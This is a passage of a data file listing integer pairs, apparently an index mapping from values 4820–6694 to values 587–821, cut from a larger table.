(4820, 587),
(4821, 587),
(4822, 587),
(4823, 587),
(4824, 587),
(4825, 587),
(4826, 587),
(4827, 587),
(4828, 587),
(4829, 588),
(4830, 588),
(4831, 588),
(4832, 588),
(4833, 588),
(4834, 588),
(4835, 589),
(4836, 589),
(4837, 589),
(4838, 589),
(4839, 589),
(4840, 589),
(4841, 590),
(4842, 590),
(4843, 590),
(4844, 590),
(4845, 590),
(4846, 590),
(4847, 591),
(4848, 591),
(4849, 591),
(4850, 591),
(4851, 591),
(4852, 591),
(4853, 592),
(4854, 592),
(4855, 592),
(4856, 592),
(4857, 592),
(4858, 592),
(4859, 593),
(4860, 593),
(4861, 593),
(4862, 593),
(4863, 593),
(4864, 593),
(4865, 594),
(4866, 594),
(4867, 594),
(4868, 594),
(4869, 594),
(4870, 594),
(4871, 595),
(4872, 595),
(4873, 595),
(4874, 595),
(4875, 595),
(4876, 595),
(4877, 596),
(4878, 596),
(4879, 596),
(4880, 596),
(4881, 596),
(4882, 596),
(4883, 597),
(4884, 597),
(4885, 597),
(4886, 597),
(4887, 597),
(4888, 597),
(4889, 598),
(4890, 598),
(4891, 598),
(4892, 598),
(4893, 598),
(4894, 598),
(4895, 599),
(4896, 599),
(4897, 599),
(4898, 599),
(4899, 599),
(4900, 599),
(4901, 600),
(4902, 600),
(4903, 600),
(4904, 600),
(4905, 600),
(4906, 600),
(4907, 601),
(4908, 601),
(4909, 601),
(4910, 601),
(4911, 601),
(4912, 601),
(4913, 602),
(4914, 602),
(4915, 602),
(4916, 602),
(4917, 602),
(4918, 602),
(4919, 603),
(4920, 603),
(4921, 603),
(4922, 603),
(4923, 603),
(4924, 603),
(4925, 603),
(4926, 603),
(4927, 603),
(4928, 604),
(4929, 604),
(4930, 604),
(4931, 604),
(4932, 604),
(4933, 604),
(4934, 605),
(4935, 605),
(4936, 605),
(4937, 605),
(4938, 605),
(4939, 605),
(4940, 606),
(4941, 606),
(4942, 606),
(4943, 606),
(4944, 606),
(4945, 606),
(4946, 607),
(4947, 607),
(4948, 607),
(4949, 607),
(4950, 607),
(4951, 607),
(4952, 608),
(4953, 608),
(4954, 608),
(4955, 608),
(4956, 608),
(4957, 608),
(4958, 609),
(4959, 609),
(4960, 609),
(4961, 609),
(4962, 609),
(4963, 609),
(4964, 610),
(4965, 610),
(4966, 610),
(4967, 610),
(4968, 610),
(4969, 610),
(4970, 611),
(4971, 611),
(4972, 611),
(4973, 611),
(4974, 611),
(4975, 611),
(4976, 612),
(4977, 612),
(4978, 612),
(4979, 612),
(4980, 612),
(4981, 612),
(4982, 613),
(4983, 613),
(4984, 613),
(4985, 613),
(4986, 613),
(4987, 613),
(4988, 614),
(4989, 614),
(4990, 614),
(4991, 614),
(4992, 614),
(4993, 614),
(4994, 615),
(4995, 615),
(4996, 615),
(4997, 615),
(4998, 615),
(4999, 615),
(5000, 616),
(5001, 616),
(5002, 616),
(5003, 616),
(5004, 616),
(5005, 616),
(5006, 617),
(5007, 617),
(5008, 617),
(5009, 617),
(5010, 617),
(5011, 617),
(5012, 618),
(5013, 618),
(5014, 618),
(5015, 618),
(5016, 618),
(5017, 618),
(5018, 619),
(5019, 619),
(5020, 619),
(5021, 619),
(5022, 619),
(5023, 619),
(5024, 619),
(5025, 619),
(5026, 619),
(5027, 620),
(5028, 620),
(5029, 620),
(5030, 620),
(5031, 620),
(5032, 620),
(5033, 621),
(5034, 621),
(5035, 621),
(5036, 621),
(5037, 621),
(5038, 621),
(5039, 622),
(5040, 622),
(5041, 622),
(5042, 622),
(5043, 622),
(5044, 622),
(5045, 623),
(5046, 623),
(5047, 623),
(5048, 623),
(5049, 623),
(5050, 623),
(5051, 624),
(5052, 624),
(5053, 624),
(5054, 624),
(5055, 624),
(5056, 624),
(5057, 625),
(5058, 625),
(5059, 625),
(5060, 625),
(5061, 625),
(5062, 625),
(5063, 626),
(5064, 626),
(5065, 626),
(5066, 626),
(5067, 626),
(5068, 626),
(5069, 627),
(5070, 627),
(5071, 627),
(5072, 627),
(5073, 627),
(5074, 627),
(5075, 628),
(5076, 628),
(5077, 628),
(5078, 628),
(5079, 628),
(5080, 628),
(5081, 629),
(5082, 629),
(5083, 629),
(5084, 629),
(5085, 629),
(5086, 629),
(5087, 630),
(5088, 630),
(5089, 630),
(5090, 630),
(5091, 630),
(5092, 630),
(5093, 631),
(5094, 631),
(5095, 631),
(5096, 631),
(5097, 631),
(5098, 631),
(5099, 632),
(5100, 632),
(5101, 632),
(5102, 632),
(5103, 632),
(5104, 632),
(5105, 633),
(5106, 633),
(5107, 633),
(5108, 633),
(5109, 633),
(5110, 633),
(5111, 634),
(5112, 634),
(5113, 634),
(5114, 634),
(5115, 634),
(5116, 634),
(5117, 635),
(5118, 635),
(5119, 635),
(5120, 635),
(5121, 635),
(5122, 635),
(5123, 635),
(5124, 635),
(5125, 635),
(5126, 636),
(5127, 636),
(5128, 636),
(5129, 636),
(5130, 636),
(5131, 636),
(5132, 637),
(5133, 637),
(5134, 637),
(5135, 637),
(5136, 637),
(5137, 637),
(5138, 638),
(5139, 638),
(5140, 638),
(5141, 638),
(5142, 638),
(5143, 638),
(5144, 639),
(5145, 639),
(5146, 639),
(5147, 639),
(5148, 639),
(5149, 639),
(5150, 640),
(5151, 640),
(5152, 640),
(5153, 640),
(5154, 640),
(5155, 640),
(5156, 641),
(5157, 641),
(5158, 641),
(5159, 641),
(5160, 641),
(5161, 641),
(5162, 642),
(5163, 642),
(5164, 642),
(5165, 642),
(5166, 642),
(5167, 642),
(5168, 643),
(5169, 643),
(5170, 643),
(5171, 643),
(5172, 643),
(5173, 643),
(5174, 644),
(5175, 644),
(5176, 644),
(5177, 644),
(5178, 644),
(5179, 644),
(5180, 645),
(5181, 645),
(5182, 645),
(5183, 645),
(5184, 645),
(5185, 645),
(5186, 646),
(5187, 646),
(5188, 646),
(5189, 646),
(5190, 646),
(5191, 646),
(5192, 647),
(5193, 647),
(5194, 647),
(5195, 647),
(5196, 647),
(5197, 647),
(5198, 648),
(5199, 648),
(5200, 648),
(5201, 648),
(5202, 648),
(5203, 648),
(5204, 649),
(5205, 649),
(5206, 649),
(5207, 649),
(5208, 649),
(5209, 649),
(5210, 650),
(5211, 650),
(5212, 650),
(5213, 650),
(5214, 650),
(5215, 650),
(5216, 651),
(5217, 651),
(5218, 651),
(5219, 651),
(5220, 651),
(5221, 651),
(5222, 651),
(5223, 651),
(5224, 651),
(5225, 652),
(5226, 652),
(5227, 652),
(5228, 652),
(5229, 652),
(5230, 652),
(5231, 653),
(5232, 653),
(5233, 653),
(5234, 653),
(5235, 653),
(5236, 653),
(5237, 654),
(5238, 654),
(5239, 654),
(5240, 654),
(5241, 654),
(5242, 654),
(5243, 655),
(5244, 655),
(5245, 655),
(5246, 655),
(5247, 655),
(5248, 655),
(5249, 656),
(5250, 656),
(5251, 656),
(5252, 656),
(5253, 656),
(5254, 656),
(5255, 657),
(5256, 657),
(5257, 657),
(5258, 657),
(5259, 657),
(5260, 657),
(5261, 658),
(5262, 658),
(5263, 658),
(5264, 658),
(5265, 658),
(5266, 658),
(5267, 659),
(5268, 659),
(5269, 659),
(5270, 659),
(5271, 659),
(5272, 659),
(5273, 660),
(5274, 661),
(5275, 662),
(5276, 663),
(5277, 664),
(5278, 665),
(5279, 666),
(5280, 667),
(5281, 668),
(5282, 669),
(5283, 670),
(5284, 671),
(5285, 672),
(5286, 673),
(5287, 674),
(5288, 675),
(5289, 676),
(5290, 677),
(5291, 678),
(5292, 679),
(5293, 680),
(5294, 681),
(5295, 682),
(5296, 683),
(5297, 684),
(5298, 685),
(5299, 686),
(5300, 687),
(5301, 688),
(5302, 689),
(5303, 690),
(5304, 691),
(5305, 692),
(5306, 693),
(5307, 694),
(5308, 695),
(5309, 696),
(5310, 697),
(5311, 698),
(5312, 699),
(5313, 700),
(5314, 701),
(5315, 702),
(5316, 703),
(5317, 704),
(5318, 705),
(5319, 706),
(5320, 707),
(5321, 708),
(5322, 709),
(5323, 710),
(5324, 711),
(5325, 712),
(5326, 713),
(5327, 714),
(5328, 715),
(5329, 716),
(5330, 717),
(5331, 718),
(5332, 719),
(5333, 720),
(5334, 721),
(5335, 722),
(5336, 723),
(5337, 724),
(5338, 725),
(5339, 726),
(5340, 727),
(5341, 728),
(5342, 729),
(5343, 730),
(5344, 731),
(5345, 732),
(5346, 733),
(5347, 734),
(5348, 735),
(5349, 736),
(5350, 737),
(5351, 738),
(5352, 739),
(5353, 740),
(5354, 741),
(5355, 742),
(5356, 743),
(5357, 744),
(5358, 745),
(5359, 746),
(5360, 747),
(5361, 748),
(5362, 749),
(5363, 750),
(5364, 751),
(5365, 752),
(5366, 753),
(5367, 754),
(5368, 755),
(5369, 756),
(5370, 757),
(5371, 758),
(5372, 759),
(5373, 660),
(5374, 661),
(5375, 662),
(5376, 663),
(5377, 664),
(5378, 665),
(5379, 666),
(5380, 667),
(5381, 668),
(5382, 669),
(5383, 670),
(5384, 671),
(5385, 672),
(5386, 673),
(5387, 674),
(5388, 675),
(5389, 676),
(5390, 677),
(5391, 678),
(5392, 679),
(5393, 680),
(5394, 681),
(5395, 682),
(5396, 683),
(5397, 684),
(5398, 685),
(5399, 686),
(5400, 687),
(5401, 688),
(5402, 689),
(5403, 690),
(5404, 691),
(5405, 692),
(5406, 693),
(5407, 694),
(5408, 695),
(5409, 696),
(5410, 697),
(5411, 698),
(5412, 699),
(5413, 700),
(5414, 701),
(5415, 702),
(5416, 703),
(5417, 704),
(5418, 705),
(5419, 706),
(5420, 707),
(5421, 708),
(5422, 709),
(5423, 710),
(5424, 711),
(5425, 712),
(5426, 713),
(5427, 714),
(5428, 715),
(5429, 716),
(5430, 717),
(5431, 718),
(5432, 719),
(5433, 720),
(5434, 721),
(5435, 722),
(5436, 723),
(5437, 724),
(5438, 725),
(5439, 726),
(5440, 727),
(5441, 728),
(5442, 729),
(5443, 730),
(5444, 731),
(5445, 732),
(5446, 733),
(5447, 734),
(5448, 735),
(5449, 736),
(5450, 737),
(5451, 738),
(5452, 739),
(5453, 740),
(5454, 741),
(5455, 742),
(5456, 743),
(5457, 744),
(5458, 745),
(5459, 746),
(5460, 747),
(5461, 748),
(5462, 749),
(5463, 750),
(5464, 751),
(5465, 752),
(5466, 753),
(5467, 754),
(5468, 755),
(5469, 756),
(5470, 757),
(5471, 758),
(5472, 759),
(5473, 660),
(5474, 660),
(5475, 660),
(5476, 660),
(5477, 660),
(5478, 660),
(5479, 661),
(5480, 661),
(5481, 661),
(5482, 661),
(5483, 661),
(5484, 661),
(5485, 662),
(5486, 662),
(5487, 662),
(5488, 662),
(5489, 662),
(5490, 662),
(5491, 663),
(5492, 663),
(5493, 663),
(5494, 663),
(5495, 663),
(5496, 663),
(5497, 664),
(5498, 664),
(5499, 664),
(5500, 664),
(5501, 664),
(5502, 664),
(5503, 665),
(5504, 665),
(5505, 665),
(5506, 665),
(5507, 665),
(5508, 665),
(5509, 666),
(5510, 666),
(5511, 666),
(5512, 666),
(5513, 666),
(5514, 666),
(5515, 667),
(5516, 667),
(5517, 667),
(5518, 667),
(5519, 667),
(5520, 667),
(5521, 667),
(5522, 667),
(5523, 667),
(5524, 668),
(5525, 668),
(5526, 668),
(5527, 668),
(5528, 668),
(5529, 668),
(5530, 669),
(5531, 669),
(5532, 669),
(5533, 669),
(5534, 669),
(5535, 669),
(5536, 670),
(5537, 670),
(5538, 670),
(5539, 670),
(5540, 670),
(5541, 670),
(5542, 671),
(5543, 671),
(5544, 671),
(5545, 671),
(5546, 671),
(5547, 671),
(5548, 672),
(5549, 672),
(5550, 672),
(5551, 672),
(5552, 672),
(5553, 672),
(5554, 673),
(5555, 673),
(5556, 673),
(5557, 673),
(5558, 673),
(5559, 673),
(5560, 674),
(5561, 674),
(5562, 674),
(5563, 674),
(5564, 674),
(5565, 674),
(5566, 675),
(5567, 675),
(5568, 675),
(5569, 675),
(5570, 675),
(5571, 675),
(5572, 676),
(5573, 676),
(5574, 676),
(5575, 676),
(5576, 676),
(5577, 676),
(5578, 677),
(5579, 677),
(5580, 677),
(5581, 677),
(5582, 677),
(5583, 677),
(5584, 678),
(5585, 678),
(5586, 678),
(5587, 678),
(5588, 678),
(5589, 678),
(5590, 679),
(5591, 679),
(5592, 679),
(5593, 679),
(5594, 679),
(5595, 679),
(5596, 680),
(5597, 680),
(5598, 680),
(5599, 680),
(5600, 680),
(5601, 680),
(5602, 681),
(5603, 681),
(5604, 681),
(5605, 681),
(5606, 681),
(5607, 681),
(5608, 682),
(5609, 682),
(5610, 682),
(5611, 682),
(5612, 682),
(5613, 682),
(5614, 683),
(5615, 683),
(5616, 683),
(5617, 683),
(5618, 683),
(5619, 683),
(5620, 683),
(5621, 683),
(5622, 683),
(5623, 684),
(5624, 684),
(5625, 684),
(5626, 684),
(5627, 684),
(5628, 684),
(5629, 685),
(5630, 685),
(5631, 685),
(5632, 685),
(5633, 685),
(5634, 685),
(5635, 686),
(5636, 686),
(5637, 686),
(5638, 686),
(5639, 686),
(5640, 686),
(5641, 687),
(5642, 687),
(5643, 687),
(5644, 687),
(5645, 687),
(5646, 687),
(5647, 688),
(5648, 688),
(5649, 688),
(5650, 688),
(5651, 688),
(5652, 688),
(5653, 689),
(5654, 689),
(5655, 689),
(5656, 689),
(5657, 689),
(5658, 689),
(5659, 689),
(5660, 689),
(5661, 689),
(5662, 690),
(5663, 690),
(5664, 690),
(5665, 690),
(5666, 690),
(5667, 690),
(5668, 691),
(5669, 691),
(5670, 691),
(5671, 691),
(5672, 691),
(5673, 691),
(5674, 692),
(5675, 692),
(5676, 692),
(5677, 692),
(5678, 692),
(5679, 692),
(5680, 693),
(5681, 693),
(5682, 693),
(5683, 693),
(5684, 693),
(5685, 693),
(5686, 694),
(5687, 694),
(5688, 694),
(5689, 694),
(5690, 694),
(5691, 694),
(5692, 695),
(5693, 695),
(5694, 695),
(5695, 695),
(5696, 695),
(5697, 695),
(5698, 695),
(5699, 695),
(5700, 695),
(5701, 696),
(5702, 696),
(5703, 696),
(5704, 696),
(5705, 696),
(5706, 696),
(5707, 697),
(5708, 697),
(5709, 697),
(5710, 697),
(5711, 697),
(5712, 697),
(5713, 698),
(5714, 698),
(5715, 698),
(5716, 698),
(5717, 698),
(5718, 698),
(5719, 699),
(5720, 699),
(5721, 699),
(5722, 699),
(5723, 699),
(5724, 699),
(5725, 700),
(5726, 700),
(5727, 700),
(5728, 700),
(5729, 700),
(5730, 700),
(5731, 701),
(5732, 701),
(5733, 701),
(5734, 701),
(5735, 701),
(5736, 701),
(5737, 701),
(5738, 701),
(5739, 701),
(5740, 702),
(5741, 702),
(5742, 702),
(5743, 702),
(5744, 702),
(5745, 702),
(5746, 703),
(5747, 703),
(5748, 703),
(5749, 703),
(5750, 703),
(5751, 703),
(5752, 704),
(5753, 704),
(5754, 704),
(5755, 704),
(5756, 704),
(5757, 704),
(5758, 705),
(5759, 705),
(5760, 705),
(5761, 705),
(5762, 705),
(5763, 705),
(5764, 706),
(5765, 706),
(5766, 706),
(5767, 706),
(5768, 706),
(5769, 706),
(5770, 707),
(5771, 707),
(5772, 707),
(5773, 707),
(5774, 707),
(5775, 707),
(5776, 707),
(5777, 707),
(5778, 707),
(5779, 708),
(5780, 708),
(5781, 708),
(5782, 708),
(5783, 708),
(5784, 708),
(5785, 709),
(5786, 709),
(5787, 709),
(5788, 709),
(5789, 709),
(5790, 709),
(5791, 710),
(5792, 710),
(5793, 710),
(5794, 710),
(5795, 710),
(5796, 710),
(5797, 711),
(5798, 711),
(5799, 711),
(5800, 711),
(5801, 711),
(5802, 711),
(5803, 712),
(5804, 712),
(5805, 712),
(5806, 712),
(5807, 712),
(5808, 712),
(5809, 713),
(5810, 713),
(5811, 713),
(5812, 713),
(5813, 713),
(5814, 713),
(5815, 713),
(5816, 713),
(5817, 713),
(5818, 714),
(5819, 714),
(5820, 714),
(5821, 714),
(5822, 714),
(5823, 714),
(5824, 715),
(5825, 715),
(5826, 715),
(5827, 715),
(5828, 715),
(5829, 715),
(5830, 716),
(5831, 716),
(5832, 716),
(5833, 716),
(5834, 716),
(5835, 716),
(5836, 717),
(5837, 717),
(5838, 717),
(5839, 717),
(5840, 717),
(5841, 717),
(5842, 718),
(5843, 718),
(5844, 718),
(5845, 718),
(5846, 718),
(5847, 718),
(5848, 719),
(5849, 719),
(5850, 719),
(5851, 719),
(5852, 719),
(5853, 719),
(5854, 719),
(5855, 719),
(5856, 719),
(5857, 720),
(5858, 720),
(5859, 720),
(5860, 720),
(5861, 720),
(5862, 720),
(5863, 721),
(5864, 721),
(5865, 721),
(5866, 721),
(5867, 721),
(5868, 721),
(5869, 722),
(5870, 722),
(5871, 722),
(5872, 722),
(5873, 722),
(5874, 722),
(5875, 723),
(5876, 723),
(5877, 723),
(5878, 723),
(5879, 723),
(5880, 723),
(5881, 724),
(5882, 724),
(5883, 724),
(5884, 724),
(5885, 724),
(5886, 724),
(5887, 725),
(5888, 725),
(5889, 725),
(5890, 725),
(5891, 725),
(5892, 725),
(5893, 725),
(5894, 725),
(5895, 725),
(5896, 726),
(5897, 726),
(5898, 726),
(5899, 726),
(5900, 726),
(5901, 726),
(5902, 727),
(5903, 727),
(5904, 727),
(5905, 727),
(5906, 727),
(5907, 727),
(5908, 728),
(5909, 728),
(5910, 728),
(5911, 728),
(5912, 728),
(5913, 728),
(5914, 729),
(5915, 729),
(5916, 729),
(5917, 729),
(5918, 729),
(5919, 729),
(5920, 730),
(5921, 730),
(5922, 730),
(5923, 730),
(5924, 730),
(5925, 730),
(5926, 731),
(5927, 731),
(5928, 731),
(5929, 731),
(5930, 731),
(5931, 731),
(5932, 731),
(5933, 731),
(5934, 731),
(5935, 732),
(5936, 732),
(5937, 732),
(5938, 732),
(5939, 732),
(5940, 732),
(5941, 733),
(5942, 733),
(5943, 733),
(5944, 733),
(5945, 733),
(5946, 733),
(5947, 734),
(5948, 734),
(5949, 734),
(5950, 734),
(5951, 734),
(5952, 734),
(5953, 735),
(5954, 735),
(5955, 735),
(5956, 735),
(5957, 735),
(5958, 735),
(5959, 736),
(5960, 736),
(5961, 736),
(5962, 736),
(5963, 736),
(5964, 736),
(5965, 737),
(5966, 737),
(5967, 737),
(5968, 737),
(5969, 737),
(5970, 737),
(5971, 737),
(5972, 737),
(5973, 737),
(5974, 738),
(5975, 738),
(5976, 738),
(5977, 738),
(5978, 738),
(5979, 738),
(5980, 739),
(5981, 739),
(5982, 739),
(5983, 739),
(5984, 739),
(5985, 739),
(5986, 740),
(5987, 740),
(5988, 740),
(5989, 740),
(5990, 740),
(5991, 740),
(5992, 741),
(5993, 741),
(5994, 741),
(5995, 741),
(5996, 741),
(5997, 741),
(5998, 742),
(5999, 742),
(6000, 742),
(6001, 742),
(6002, 742),
(6003, 742),
(6004, 743),
(6005, 743),
(6006, 743),
(6007, 743),
(6008, 743),
(6009, 743),
(6010, 744),
(6011, 744),
(6012, 744),
(6013, 744),
(6014, 744),
(6015, 744),
(6016, 745),
(6017, 745),
(6018, 745),
(6019, 745),
(6020, 745),
(6021, 745),
(6022, 746),
(6023, 746),
(6024, 746),
(6025, 746),
(6026, 746),
(6027, 746),
(6028, 747),
(6029, 747),
(6030, 747),
(6031, 747),
(6032, 747),
(6033, 747),
(6034, 748),
(6035, 748),
(6036, 748),
(6037, 748),
(6038, 748),
(6039, 748),
(6040, 749),
(6041, 749),
(6042, 749),
(6043, 749),
(6044, 749),
(6045, 749),
(6046, 750),
(6047, 750),
(6048, 750),
(6049, 750),
(6050, 750),
(6051, 750),
(6052, 750),
(6053, 750),
(6054, 750),
(6055, 751),
(6056, 751),
(6057, 751),
(6058, 751),
(6059, 751),
(6060, 751),
(6061, 752),
(6062, 752),
(6063, 752),
(6064, 752),
(6065, 752),
(6066, 752),
(6067, 753),
(6068, 753),
(6069, 753),
(6070, 753),
(6071, 753),
(6072, 753),
(6073, 754),
(6074, 754),
(6075, 754),
(6076, 754),
(6077, 754),
(6078, 754),
(6079, 755),
(6080, 755),
(6081, 755),
(6082, 755),
(6083, 755),
(6084, 755),
(6085, 756),
(6086, 756),
(6087, 756),
(6088, 756),
(6089, 756),
(6090, 756),
(6091, 757),
(6092, 757),
(6093, 757),
(6094, 757),
(6095, 757),
(6096, 757),
(6097, 758),
(6098, 758),
(6099, 758),
(6100, 758),
(6101, 758),
(6102, 758),
(6103, 759),
(6104, 759),
(6105, 759),
(6106, 759),
(6107, 759),
(6108, 759),
(6109, 760),
(6110, 761),
(6111, 762),
(6112, 763),
(6113, 764),
(6114, 765),
(6115, 766),
(6116, 767),
(6117, 768),
(6118, 769),
(6119, 770),
(6120, 771),
(6121, 772),
(6122, 773),
(6123, 774),
(6124, 775),
(6125, 776),
(6126, 777),
(6127, 778),
(6128, 779),
(6129, 780),
(6130, 781),
(6131, 782),
(6132, 783),
(6133, 784),
(6134, 785),
(6135, 786),
(6136, 787),
(6137, 788),
(6138, 789),
(6139, 790),
(6140, 791),
(6141, 792),
(6142, 793),
(6143, 794),
(6144, 795),
(6145, 796),
(6146, 797),
(6147, 798),
(6148, 799),
(6149, 800),
(6150, 801),
(6151, 802),
(6152, 803),
(6153, 804),
(6154, 805),
(6155, 806),
(6156, 807),
(6157, 808),
(6158, 809),
(6159, 810),
(6160, 811),
(6161, 812),
(6162, 813),
(6163, 814),
(6164, 815),
(6165, 816),
(6166, 817),
(6167, 818),
(6168, 819),
(6169, 820),
(6170, 821),
(6171, 822),
(6172, 823),
(6173, 824),
(6174, 825),
(6175, 826),
(6176, 827),
(6177, 828),
(6178, 829),
(6179, 830),
(6180, 831),
(6181, 832),
(6182, 833),
(6183, 834),
(6184, 835),
(6185, 836),
(6186, 837),
(6187, 838),
(6188, 839),
(6189, 840),
(6190, 841),
(6191, 842),
(6192, 843),
(6193, 844),
(6194, 845),
(6195, 846),
(6196, 847),
(6197, 848),
(6198, 849),
(6199, 850),
(6200, 851),
(6201, 852),
(6202, 853),
(6203, 854),
(6204, 855),
(6205, 856),
(6206, 857),
(6207, 858),
(6208, 859),
(6209, 760),
(6210, 761),
(6211, 762),
(6212, 763),
(6213, 764),
(6214, 765),
(6215, 766),
(6216, 767),
(6217, 768),
(6218, 769),
(6219, 770),
(6220, 771),
(6221, 772),
(6222, 773),
(6223, 774),
(6224, 775),
(6225, 776),
(6226, 777),
(6227, 778),
(6228, 779),
(6229, 780),
(6230, 781),
(6231, 782),
(6232, 783),
(6233, 784),
(6234, 785),
(6235, 786),
(6236, 787),
(6237, 788),
(6238, 789),
(6239, 790),
(6240, 791),
(6241, 792),
(6242, 793),
(6243, 794),
(6244, 795),
(6245, 796),
(6246, 797),
(6247, 798),
(6248, 799),
(6249, 800),
(6250, 801),
(6251, 802),
(6252, 803),
(6253, 804),
(6254, 805),
(6255, 806),
(6256, 807),
(6257, 808),
(6258, 809),
(6259, 810),
(6260, 811),
(6261, 812),
(6262, 813),
(6263, 814),
(6264, 815),
(6265, 816),
(6266, 817),
(6267, 818),
(6268, 819),
(6269, 820),
(6270, 821),
(6271, 822),
(6272, 823),
(6273, 824),
(6274, 825),
(6275, 826),
(6276, 827),
(6277, 828),
(6278, 829),
(6279, 830),
(6280, 831),
(6281, 832),
(6282, 833),
(6283, 834),
(6284, 835),
(6285, 836),
(6286, 837),
(6287, 838),
(6288, 839),
(6289, 840),
(6290, 841),
(6291, 842),
(6292, 843),
(6293, 844),
(6294, 845),
(6295, 846),
(6296, 847),
(6297, 848),
(6298, 849),
(6299, 850),
(6300, 851),
(6301, 852),
(6302, 853),
(6303, 854),
(6304, 855),
(6305, 856),
(6306, 857),
(6307, 858),
(6308, 859),
(6309, 760),
(6310, 760),
(6311, 760),
(6312, 760),
(6313, 760),
(6314, 760),
(6315, 761),
(6316, 761),
(6317, 761),
(6318, 761),
(6319, 761),
(6320, 761),
(6321, 762),
(6322, 762),
(6323, 762),
(6324, 762),
(6325, 762),
(6326, 762),
(6327, 763),
(6328, 763),
(6329, 763),
(6330, 763),
(6331, 763),
(6332, 763),
(6333, 763),
(6334, 763),
(6335, 763),
(6336, 764),
(6337, 764),
(6338, 764),
(6339, 764),
(6340, 764),
(6341, 764),
(6342, 765),
(6343, 765),
(6344, 765),
(6345, 765),
(6346, 765),
(6347, 765),
(6348, 766),
(6349, 766),
(6350, 766),
(6351, 766),
(6352, 766),
(6353, 766),
(6354, 767),
(6355, 767),
(6356, 767),
(6357, 767),
(6358, 767),
(6359, 767),
(6360, 768),
(6361, 768),
(6362, 768),
(6363, 768),
(6364, 768),
(6365, 768),
(6366, 769),
(6367, 769),
(6368, 769),
(6369, 769),
(6370, 769),
(6371, 769),
(6372, 770),
(6373, 770),
(6374, 770),
(6375, 770),
(6376, 770),
(6377, 770),
(6378, 771),
(6379, 771),
(6380, 771),
(6381, 771),
(6382, 771),
(6383, 771),
(6384, 772),
(6385, 772),
(6386, 772),
(6387, 772),
(6388, 772),
(6389, 772),
(6390, 773),
(6391, 773),
(6392, 773),
(6393, 773),
(6394, 773),
(6395, 773),
(6396, 774),
(6397, 774),
(6398, 774),
(6399, 774),
(6400, 774),
(6401, 774),
(6402, 775),
(6403, 775),
(6404, 775),
(6405, 775),
(6406, 775),
(6407, 775),
(6408, 776),
(6409, 776),
(6410, 776),
(6411, 776),
(6412, 776),
(6413, 776),
(6414, 776),
(6415, 776),
(6416, 776),
(6417, 777),
(6418, 777),
(6419, 777),
(6420, 777),
(6421, 777),
(6422, 777),
(6423, 778),
(6424, 778),
(6425, 778),
(6426, 778),
(6427, 778),
(6428, 778),
(6429, 779),
(6430, 779),
(6431, 779),
(6432, 779),
(6433, 779),
(6434, 779),
(6435, 780),
(6436, 780),
(6437, 780),
(6438, 780),
(6439, 780),
(6440, 780),
(6441, 781),
(6442, 781),
(6443, 781),
(6444, 781),
(6445, 781),
(6446, 781),
(6447, 782),
(6448, 782),
(6449, 782),
(6450, 782),
(6451, 782),
(6452, 782),
(6453, 783),
(6454, 783),
(6455, 783),
(6456, 783),
(6457, 783),
(6458, 783),
(6459, 784),
(6460, 784),
(6461, 784),
(6462, 784),
(6463, 784),
(6464, 784),
(6465, 785),
(6466, 785),
(6467, 785),
(6468, 785),
(6469, 785),
(6470, 785),
(6471, 786),
(6472, 786),
(6473, 786),
(6474, 786),
(6475, 786),
(6476, 786),
(6477, 787),
(6478, 787),
(6479, 787),
(6480, 787),
(6481, 787),
(6482, 787),
(6483, 788),
(6484, 788),
(6485, 788),
(6486, 788),
(6487, 788),
(6488, 788),
(6489, 789),
(6490, 789),
(6491, 789),
(6492, 789),
(6493, 789),
(6494, 789),
(6495, 789),
(6496, 789),
(6497, 789),
(6498, 790),
(6499, 790),
(6500, 790),
(6501, 790),
(6502, 790),
(6503, 790),
(6504, 791),
(6505, 791),
(6506, 791),
(6507, 791),
(6508, 791),
(6509, 791),
(6510, 792),
(6511, 792),
(6512, 792),
(6513, 792),
(6514, 792),
(6515, 792),
(6516, 793),
(6517, 793),
(6518, 793),
(6519, 793),
(6520, 793),
(6521, 793),
(6522, 794),
(6523, 794),
(6524, 794),
(6525, 794),
(6526, 794),
(6527, 794),
(6528, 795),
(6529, 795),
(6530, 795),
(6531, 795),
(6532, 795),
(6533, 795),
(6534, 796),
(6535, 796),
(6536, 796),
(6537, 796),
(6538, 796),
(6539, 796),
(6540, 797),
(6541, 797),
(6542, 797),
(6543, 797),
(6544, 797),
(6545, 797),
(6546, 798),
(6547, 798),
(6548, 798),
(6549, 798),
(6550, 798),
(6551, 798),
(6552, 799),
(6553, 799),
(6554, 799),
(6555, 799),
(6556, 799),
(6557, 799),
(6558, 800),
(6559, 800),
(6560, 800),
(6561, 800),
(6562, 800),
(6563, 800),
(6564, 801),
(6565, 801),
(6566, 801),
(6567, 801),
(6568, 801),
(6569, 801),
(6570, 802),
(6571, 802),
(6572, 802),
(6573, 802),
(6574, 802),
(6575, 802),
(6576, 802),
(6577, 802),
(6578, 802),
(6579, 803),
(6580, 803),
(6581, 803),
(6582, 803),
(6583, 803),
(6584, 803),
(6585, 804),
(6586, 804),
(6587, 804),
(6588, 804),
(6589, 804),
(6590, 804),
(6591, 805),
(6592, 805),
(6593, 805),
(6594, 805),
(6595, 805),
(6596, 805),
(6597, 806),
(6598, 806),
(6599, 806),
(6600, 806),
(6601, 806),
(6602, 806),
(6603, 807),
(6604, 807),
(6605, 807),
(6606, 807),
(6607, 807),
(6608, 807),
(6609, 808),
(6610, 808),
(6611, 808),
(6612, 808),
(6613, 808),
(6614, 808),
(6615, 809),
(6616, 809),
(6617, 809),
(6618, 809),
(6619, 809),
(6620, 809),
(6621, 810),
(6622, 810),
(6623, 810),
(6624, 810),
(6625, 810),
(6626, 810),
(6627, 811),
(6628, 811),
(6629, 811),
(6630, 811),
(6631, 811),
(6632, 811),
(6633, 812),
(6634, 812),
(6635, 812),
(6636, 812),
(6637, 812),
(6638, 812),
(6639, 813),
(6640, 813),
(6641, 813),
(6642, 813),
(6643, 813),
(6644, 813),
(6645, 814),
(6646, 814),
(6647, 814),
(6648, 814),
(6649, 814),
(6650, 814),
(6651, 815),
(6652, 815),
(6653, 815),
(6654, 815),
(6655, 815),
(6656, 815),
(6657, 815),
(6658, 815),
(6659, 815),
(6660, 816),
(6661, 816),
(6662, 816),
(6663, 816),
(6664, 816),
(6665, 816),
(6666, 817),
(6667, 817),
(6668, 817),
(6669, 817),
(6670, 817),
(6671, 817),
(6672, 818),
(6673, 818),
(6674, 818),
(6675, 818),
(6676, 818),
(6677, 818),
(6678, 819),
(6679, 819),
(6680, 819),
(6681, 819),
(6682, 819),
(6683, 819),
(6684, 820),
(6685, 820),
(6686, 820),
(6687, 820),
(6688, 820),
(6689, 820),
(6690, 821),
(6691, 821),
(6692, 821),
(6693, 821),
(6694, 821),
